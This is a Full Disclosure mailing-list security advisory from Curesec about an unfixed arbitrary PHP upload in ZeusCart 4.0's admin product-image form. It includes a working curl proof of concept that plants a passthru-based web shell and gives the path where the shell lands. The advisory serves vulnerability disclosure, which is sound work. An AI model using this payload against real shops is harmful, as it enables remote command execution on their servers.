Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

ZeusCart 4.0: Code Execution - not fixed

From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 14 Sep 2015 18:21:05 +0200
ZeusCart 4.0: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:       ZeusCart 4.0    
Fixed in:               not fixed
Fixed Version Link:     n/a     
Vendor Contact:         support () zeuscart com 
Vulnerability Type:     Code Execution  
Remote Exploitable:     Yes     
Reported to vendor:     08/13/2015      
Disclosed to public:    09/14/2015      
Release mode:           Full Disclosure 
CVE:                    n/a     
Credits                 Tim Coen of Curesec GmbH        

2. Vulnerability Description

It is possible to upload PHP files when uploading an image for a new
product. This leads to code execution once an attacker has gained access
to the backend via SQL Injection, CSRF, or XSS.

Please note that an admin account with the right to add products is needed.

3. Proof of Concept


curl -i -s -k  -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \
    -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
    --data-binary $'----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d
\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data;
name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type:
application/x-php\x0d\x0a\x0d\x0a<?php
\x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition:
form-data;
name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \

'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert&apos;
The image will be located here:
http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015      Informed Vendor about Issue (no reply)
09/07/2015      Reminded Vendor of release date (no reply)
09/14/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: